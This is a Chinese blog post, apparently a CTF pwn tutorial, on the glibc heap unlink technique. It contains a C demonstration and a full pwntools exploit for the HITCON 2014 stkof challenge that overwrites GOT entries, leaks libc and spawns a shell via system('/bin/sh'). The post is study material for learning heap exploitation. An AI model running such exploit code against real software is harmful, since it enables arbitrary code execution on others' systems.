【堆漏洞-unlink】

最新推荐文章于 2024-01-18 14:58:45 发布
最新推荐文章于 2024-01-18 14:58:45 发布
阅读量398 收藏 3
点赞数
文章标签: 系统安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52343643/article/details/126217015
版权

unlink简介

unlink的过程含义

当一个堆块(非fastbin)释放时,libc会先看其相邻的堆块是否空闲,空闲的话就将这个相邻堆块从bins中取出,并与当前释放堆块合并,而这个bins中取出堆块的过程就是unlink。

unlink利用原理

unlink源码实现
FD = P->fd;
BK = P->bk;
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                      
  malloc_printerr (check_action, "corrupted double-linked list", P, AV);
else{
	FD->bk = BK;
	BK->fd = FD;
	........
}

更改 chunk 的 fd 和 bk 为 chunk_ptr - 0x18 和 chunk_ptr - 0x10,即
(在chunk的堆块中做的变化)

  • FD_chunk = chunk->fd = chunk - 0x18 == ①
  • BK_chunk = chunk->bk = chunk - 0x10

那么就可以绕过第一个检查:

  • FD_chunk->bk = chunk - 0x18 + 0x18 = chunk
  • BK_chunk->fd = chunk - 0x10 + 0x10 = chunk

绕过第一个检查后:
(非chunk堆块中做的变化)

  • FD_chunk->bk = chunk = BK_chunk = chunk - 0x10
  • BK_chunk->fd = chunk = FD_chunk = chunk - 0x18 == ②

最终得到的结果(联系①②式)是:chunk = chunk - 0x18 = chunk->fd

因此最后我们只需要修改chunk的地址下内容,就可以对chunk-0x18地址进行任意写了


unlink示例

代码
演示unlink后实现了 chunk->bk = chunk,libc版本是基于2.23及以下版本,可以使用patchelf工具来修改libc版本

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

uint64_t *chunk0_ptr;
int main(){
    chunk0_ptr = (uint64_t*)malloc(0x80);
    uint64_t* chunk1_ptr = (uint64_t*)malloc(0x80);
    fprintf(stderr,"chunk0_ptr: %p -> %p\n",&chunk0_ptr,chunk0_ptr);
    fprintf(stderr,"victim chunk: %p -> %p\n\n",&chunk1_ptr,chunk1_ptr);

    /* chunk0_ptr[1] = 0x80;  // chunk0's fake size = 0x80, pass check  */
    chunk0_ptr[2] = (uint64_t) &chunk0_ptr - 0x18; 
    chunk0_ptr[3] = (uint64_t) &chunk0_ptr - 0x10;
    fprintf(stderr,"fake fd: %p = &chunk0_ptr - 0x18\n",(void* )chunk0_ptr[2]); 
    fprintf(stderr,"fake bk: %p = &chunk0_ptr - 0x10\n",(void* )chunk0_ptr[3]);

    uint64_t* chunk1_hdr = (void*)chunk1_ptr - 0x10;  // chunk1's size area
    chunk1_hdr[0] = 0x80;  // pre_size = 0x80, chunk0's fake size = 0x80
    chunk1_hdr[1] &= ~1;   // make chunk0 seem free

    /*int *t[10],i;            //tcache
    for(i=0;i<7;i++){
        t[i] = malloc(0x80);
    }
    for(i=0;i<7;i++){
        free(t[i]);
    }*/

    free(chunk1_ptr);      //unlink

    char victim_str[8] = "AAAAAAAA";
    chunk0_ptr[3] = (uint64_t)victim_str;
    fprintf(stderr,"old string: %s\n",victim_str);

    chunk0_ptr[0] = 0x42424242424242LL;
    fprintf(stderr,"new Value: %s\n",victim_str);

}

结果
victim_str是存放在chunk0_ptr[3]地址下,但通过修改 chunk0_ptr[0],victim_str发生了改变,证明了 chunk0 = chunk0 - 0x18
在这里插入图片描述
结论
只需要将上面的chunk0,即伪造的fd改为我们想要控制的目的地址-0x18,在实现unlink之后修改chunk0的fd就相当于修改目的地址下的内容



实例1 - 2014 HITCON stkof

函数功能分析
  1. alloc函数:fget接收size,malloc开辟size大小的堆空间,堆指针放入globals数组,打印堆指针在globals数组的索引
  2. fill函数:fget接收globals数组索引,接收size,在索引指向的堆指针下存放size大小的数据。没有限制size大小与malloc时的size一样,所以存在堆溢出漏洞。
  3. free_chunk函数:fget接收globals数组索引,free索引对应的堆指针,将堆指针设为0
  4. print函数:没有意义
基本思路
  1. 填充一个chunk伪造一个fake chunk,覆盖下一个chunk的size域伪造前一个chunk是我们伪造的新chunk并处于释放状态
  2. unlink修改控制地址,即globals中的堆指针发生改变
  3. 控制地址修改成功就可以依次修改堆指针为我们想要的地址,并在这些地址下任意写入内容

题目给了libc.so,用patchelf工具修改程序libc,并根据libc版本修改程序的ld版本

patchelf --replace-needed libc.so.6 你要换的libc的硬路径 ./pwn
patchelf --set-interpreter ld的硬路径 ./pwn
exp分析
  1. 开辟堆空间,这里开辟了3个堆空间,第一个堆空间用来填充fgets和printf分配(malloc)的缓冲区
	alloc(0x100)  #chunk1
    alloc(0x30)   #chunk2
    alloc(0x80)	  #chunk3

可以看到globals数组中的指针,chunk2和chunk3是才是连着的,可以实现覆盖

#globals
0x602140:	0x0000000000000000	0x00000000027aa020
0x602150:	0x00000000027aa540	0x00000000027aa580
  1. fill chunk2覆盖chunk3
    a) 填充chunk2伪造一个0x20大小的chunk,并为这个chunk写入fd与bk(后面要伪造这个chunk为free chunk)
    b) 接着填充的0x20用来通过伪造的chunk的chunk's prev_size pass check,后8个字节随意填充
    c) 覆盖chunk3的pre_size为0x30,size为0x90,这样可以伪造上一个chunk为free状态,free chunk3的时候,因为pre_size为0x30,向上找到的free chunk其实是我们伪造的chunk,而这个时候0x20的伪造chunk还会check 0x20之后的chunk (也就是0x20向下偏移的 “next chunk ”) 的pre_size是否是0x20,我们刚好也覆盖了伪造chunk后面为0x20,所以能通过这个 check
	pload = p64(0) + p64(0x20)  #fake chunk’s size域
    pload += p64(globals_2 - 0x18) + p64(globals_2 - 0x10)  #fd、bk; globals_2作为我们要控制(变化或修改)的地址
    pload += p64(0x20)  #fake pre_size to pass the check
    pload = pload.ljust(0x30,'a')

    pload += p64(0x30) + p64(0x90)  #overflow chunk3's size域
    #gdb.attach(p)
    fill(2,len(pload),pload)

覆盖后的堆情况:

#fill chunk2, overflow chunk3
0x27aa530:	0x0000000000000000	0x0000000000000041  --> chunk2
0x27aa540:	0x0000000000000000	0x0000000000000020  --> fake chunk
0x27aa550:	0x0000000000602138	0x0000000000602140
0x27aa560:	0x0000000000000020	0x6161616161616161
0x27aa570:	0x0000000000000030	0x0000000000000090   --> chunk3
0x27aa580:	0x0000000000000000	0x0000000000000000
  1. free chunk3,实现unlink
    我们的globals_2 = 0x602140 + 0x8*2 = 0x602150,unlink之后 *(globals_2) = globals_2 - 0x18 = 0x602138
	free(3)
	p.recvuntil("OK\n")  #将结束后打印"OK\n"接收掉

unlink之后的globals,globals[3] = 0,globals[2] = &globals_2 - 0x18,chunk2的堆指针放在0x602150地址下,之后如果我们编辑chunk2会先取到这个地址下的堆指针0x602138,然后写入chunk2的内容实际就写入到了0x602138地址下面,就可以修改globals中堆指针,然后向这些指针下任意写入内容

#globals
0x602140:	0x0000000000000000	0x00000000027aa020
0x602150:	0x0000000000602138	0x0000000000000000
  1. 获取put地址,修改chunk2内容,将globals数组的从索引0开始的堆指针依次改为 free.got、puts.got、atoi.got ,修改chunk0(free.got)地址下内容为puts.plt,调用free(1)时执行 puts(puts.got)得到puts真实地址
	# 0x602138地址开始填充以下pload
	pload = 'a'*8 + p64(stkof.got['free']) + p64(stkof.got['puts']) + p64(stkof.got['atoi']) #修改globals堆指针
    fill(2,len(pload),pload)

    pload = p64(stkof.plt['puts'])  #修改free.got地址下内容为puts.plt
    fill(0,len(pload),pload)

    free(1)  # puts(puts.got)得到puts地址
    puts_addr = p.recvuntil('\nOK\n',drop=True).ljust(8,'\x00')
    puts_addr = u64(puts_addr)

之后相继获取system和binsh地址即可

  1. 获取shell,因为上面free完之后就是fget接收新的choice然后是atoi(choice),所以之前我们将chunk2的堆指针改为atoi留在这里用,我们只需要修改chunk2将atoi.got下写入system地址,然后再fgets的时候输入binsh地址,最后就可以实现system(binsh)
	pload = p64(system)
    fill(2,len(pload),pload)  #修改chunk2,即atoi.got为system地址
    p.send(p64(binsh)) # 发送atoi参数binsh
    p.interactive()

完整EXP

from pwn import *

p = process('./stkof')
stkof = ELF('./stkof')
libc = ELF('./libc.so.6')
globals_2 = 0x602140 + 0x8*2

def alloc(size):
    p.sendline('1')
    p.sendline(str(size))
    p.recvuntil("OK\n")

def fill(idx,size,content):
    p.sendline("2")
    p.sendline(str(idx))
    p.sendline(str(size))
    p.send(content)
    p.recvuntil("OK\n")

def free(idx):
    p.sendline('3')
    p.sendline(str(idx))

def exp():
    gdb.attach(p)
    alloc(0x100)
    alloc(0x30)
    alloc(0x80)

    pload = p64(0) + p64(0x20)
    pload += p64(globals_2 - 0x18) + p64(globals_2 - 0x10)
    pload += p64(0x20)
    pload = pload.ljust(0x30,'a')

    pload += p64(0x30) + p64(0x90)
    #gdb.attach(p)
    fill(2,len(pload),pload)

    free(3)
    p.recvuntil("OK\n")

    pload = 'a'*8 + p64(stkof.got['free']) + p64(stkof.got['puts']) + p64(stkof.got['atoi'])
    fill(2,len(pload),pload)

    pload = p64(stkof.plt['puts'])
    fill(0,len(pload),pload)

    free(1)
    puts_addr = p.recvuntil('\nOK\n',drop=True).ljust(8,'\x00')
    puts_addr = u64(puts_addr)
    log.success('puts: ' + hex(puts_addr))
    base = puts_addr - libc.sym['puts']# -0xc0
    binsh = base + libc.search('/bin/sh').next()
    system = base + libc.sym['system']
    log.success('libc base: ' + hex(base))
    log.success('/bin/sh addr: ' + hex(binsh))
    log.success('system addr: ' + hex(system))

    pload = p64(system)
    fill(2,len(pload),pload)
    #gdb.attach(p)
    p.send(p64(binsh))
    p.interactive()

if __name__ == "__main__":
    exp()
annEleven
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Unlink Tweet-crx插件
03-09
中断自动链接,例如选定推文中的URL ## 为什么? 您是否经历过各种无意间链接的东西? 例如,-方法调用,例如'receiver.foo()'-降价文件名,例如'README.md'-C的预处理器宏,例如'#include'-Ruby的实例变量'@foo'和/或全局变量' $ bar'如果您感到烦恼,则此存储库提供的工具或库将为您提供帮助。 ##用法您可以在twitter.com或mobile.twitter.com上轻松删除所选文本中的自动链接。 最简单的方法是使用上下文菜单项。 1.在twitter.com或mobile.twitter.com上以推文形式选择您的推文文本。 2.右键单击3.选择“取消链接Tweet文本”项它会自动使用未链接的文本更新选定的文本。 如果您要控制未链接的内容,请在显示鸣叫形式时单击Chrome工具栏上的扩展程序图标。 它显示一个带有复选框和按钮的弹出窗口。 请检查您要取消链接的内容,然后单击按钮。 出于技术原因,请在https://twitter.com上选择推文。 此功能还作为网站和CLI提供。 如果您愿意,请尝试一下。 -https://rhysd.github.io/unlink-tweet-https://www.npmjs.com/package/unlink-tweet-cli ##信用此扩展在GitHub存储库中开发。 请在此提交错误报告。 https://www.npmjs.com/package/break-tweet-autolink此扩展根据MIT许可证分发。 版权所有(c)2019 Rhysd 支持语言:English
漏洞之unlink1
08-04
unlink 漏洞利用技巧的核心就在下面这几行代码:SP00F|版权属于我个人所有,你可以用于学习,但不可以用于商业目的漏洞利用的技巧就是覆盖相邻(下一个或下下
Unlink-crx插件
04-04
语言:English 取消链接链接缩短服务(当前仅sh.st) 扩展程序可以通过将您重定向到最终URL来绕过链接广告服务。 目前支持sh.st。 未来将提供更多服务。 在https://github.com/berezovskyi/chrome-unlink上欢迎错误报告以及请求请求。 Freepik(http://www.freepik.com)从www.flaticon.com制作的图标已根据Creative Commons BY 3.0许可使用
remark-unlink:该插件可删除所有链接,图像,引用和定义
05-10
备注取消链接 插件可删除所有链接,图像,引用和定义。 最初的动机是以易于阅读为纯文本的方式来处理Markdown文档。 在电子书阅读器或一张纸上,链接无用且难看。 笔记! 此插件已准备就绪,可用于remark中的新解析器( )。 无需更改:它现在的工作原理与以前完全相同! 安装 : npm install remark-unlink 用 假设我们有以下文件example.md 。 试想一下,部分标题和URL会更长一些。 ## TOC - [ section 1 ](#section-1) - [ section 2 ](#section-2) ## section 1 Section [ content ][1] may include some [ links ](https://domain.name/path). [ 1 ]: https://domain.name/p
unlink 入门
qq_42220888的博客
08-03 244
关于ctf pwn unlink学习
linux内核pwn,浅谈Linux Pwn Unlink机制
weixin_31361715的博客
04-29 483
unlink溢出中的一种常见的利用形式,通过将双向列表中的空闲块拿出来与将要free的物理相邻的块进行合并。unlink对于最初接触的人来说机制比较难以理解,笔者会结合unlink的实现源码以及使用gdb调试对unlink进行阐述。unlink的触发当使用free函数释放正在使用的chunk时,会相应地检查其相邻的chunk是否为空闲,如果为空闲则会将相邻的chunk与free的chunk进行...
【pwn学习溢出(三)- Unlink和UAF
Morphy_Amo的博客
01-21 1553
溢出中的unlink和UAF
CTF PWN之heap入门 unlink
L2329794714的博客
09-09 1602
unlink的利用需要申请连续的chunk,为了方便我们先要让IO两个缓冲区都申请了,即程序执行至少以此IO输出,一次IO此输入(这里可以让程序执行一遍创建块的流程实现),后面再创建两个相邻的块,后面一个大小大于0x80,再前一个块里伪造一个释放状态的chunk,并利用溢出改写后一个chunk的P_size(伪造chunk的大小包括chunk头),和size(in_user为为0),然后free后面的chunk来触发前合并,从而进行unlink。P:为要取出的chunk指针(指向chunk头的)
我又pwn啦——理论篇 unlink
m0_64195960的博客
06-20 537
1)定义:在双向链表中取出一个chunk的操作2)使用时间:1、malloc·在恰好大小的large chunk处取chunk时·在比请求大小大的bin中取chunk时2、Free·后向合并,合并物理相邻低物理地址空闲chunk时·前向合并,合并物理相邻高物理地空闲chunk时(top chunk除外)3、malloc_consolidate·后向合并,合并物理相邻低地址空闲chunk时·前向合并,合并物理相邻高地址空闲chunk时(top chunk除外)4、realloc前向扩展,合并物理相邻高地址空闲
【pwn | 知识】关于unlink的体会 [ZJCTF EasyHeap]
ethan18的博客
08-15 221
当进行unlink的时候,正如同它的名字,它是会被从这个链表中取出来的(unlink也就是取消自己的link状态了)主要的思路就是通过创建3个chunk,将第一个chunk通过edit函数来修改chunk内容和下一个chunk的头部,变成一个伪造的空闲chunk,然后free第2个chunk,这会导致第一个chunk被unlink。在我看来,unlink的原理是,当你free了一个chunk的时候,如果你的物理相邻的chunk如果是空闲状态,那么这个空闲的chunk就会被合并,形成一个更大的chunk。
pwn 入门之unlink
清霂的博客
04-11 203
目录stkof stkof #!/usr/bin/env python2 from pwn import * arch = "amd64" filename = "stkof" context(os="linux", arch=arch, log_level="debug") content = 0 #elf elf = ELF(filename) fgets_addr=0x0000000000400D16 fill_addr=0x00000000004009E8 free_got=elf.got['
PWN之利用-unlink攻击
susuate的博客
07-18 1606
环境配置 笔者使用ubuntu14.04.6_desktop_i386 国内镜像网站如下: http://mirrors.aliyun.com/ubuntu-releases/14.04/ glibc版本2.20 unlink攻击
CTF用户态pwn总结(二) Unlink
weixin_41918450的博客
09-26 1556
CTF用户态pwn总结(二) Unlink unlink是CTF中非常常见的一种题型 unlink时的一些性质 unlink是在free掉一个chunk的时候,如果与之相邻的chunk是free状态,并且不是投票chunk时,会将chunk从原来的链表中unlink,并触发合并,fast bin并不会触发合并,只有当满足条件触发fast bin合并时,即当申请的chunk大小大于fast bins...
CTF(pwn) 利用 之 unlink 介绍
半岛铁盒的博客
07-01 865
unlink是链表中常见的操作,而我们需要利用这个过程 通过改变链表指针,使中间块拿出来 当前的unlink会有一个对链表的完整性检查的 // 由于 P 已经在双向链表中,所以有两个地方记录其大小,所以检查一下其大小是否一致(size检查) if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0)) \ malloc_printerr ("corrupted size vs. prev_size");
Pwn Unlink攻击技术原理以及例题
红叶的博客
12-17 999
现在有这么三个chunk,其中我们已经构造好了Unlink的Payload。乍一看可能有点一头雾水,那么如果我们把这段看成一个chunk结构体呢?反之,另一个也是这个道理。glibc 2.23中的unlink宏源码是这样的。,这段恰好满足我们的unlink需求。,也就是我们的fake_chunk。,我们直接查看这个fd指向了哪里。,P是fake_chunk,也就是。这题的块指针位于bss段内,是。P是fake_chunk,即可获得我们的fd和bk。complete,或者说。指向的都是同一个地方。
二进制安全之——相关漏洞
PICACHU+++的博客
10-10 2190
主要是指用户动态申请的内存(如:调用malloc,alloc,alloca,new等函数)。glibc malloc源码中有三种最基本的块数据结构,分别是heap_info,malloc_state,malloc_chunk。
【pwn】[SUCTF 2018 招新赛]unlink --利用之unlink
最新发布
question55的博客
01-18 1407
先来看一下程序的保护情况栈不可执行,而且还开了canary看一下ida又是经典菜单题,接着分析每一个函数功能就行touch函数:有一个数组存malloc出来的地址delete函数:删除中的数据,不存在uaf漏洞show函数:打印中数据take_note函数:向中写数据分析到这里,根据题目的提示,那就用unlink来打,这里有篇博客可以先学习一下:【pwn学习溢出(三)- Unlink和UAF_溢出 got表-CSDN博客首先我们先创建三个块debug看一下再看看一下存地址的数组接着我们来构
​Unlink
weixin_42492218的博客
05-10 258
¶ZCTF 2016 的一道题目,考点是 safe unlink 的利用。¶题目是一个 notepad,提供了创建、删除、编辑、查看笔记的功能1.New note5.Quit保护如下所示NX : YesPIE : No¶程序 New 功能用来新建笔记,笔记的大小可以自定只要小于 1024 字节。int new()所有的笔记 malloc 出来的指针存放在 bss 上全局数组 bss_ptr 中,这个数组最多可以存放 8 个 heap_ptr。
Unlink
kelxLZ的博客
07-03 1543
Author:ZERO-A-ONE Date:2021-07-03 一、unlink的原理 简介:俗称脱链,就是将链表头处的free块unsorted bin中脱离出来然后和物理地址相邻的新free的块合并成大块(向前合并或者向后合并),再放入到unsorted bin中 危害原理:通过伪造free状态的fake_chunk,伪造fd指针和bk指针,通过绕过unlink的检测实现unlink,unlink就会往p所在的位置写入p-0x18,从而实现任意地址写的漏洞 漏洞产生原因:off.
el-date-picker unlink-panels
10-21
el-date-picker是一个日期选择器组件,unlink-panels是其中的一个属性。当unlink-panels设置为false时,el-date-picker的两个日期面板会联动,即一个面板的选择会影响另一个面板的选择。而当unlink-panels设置为true...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值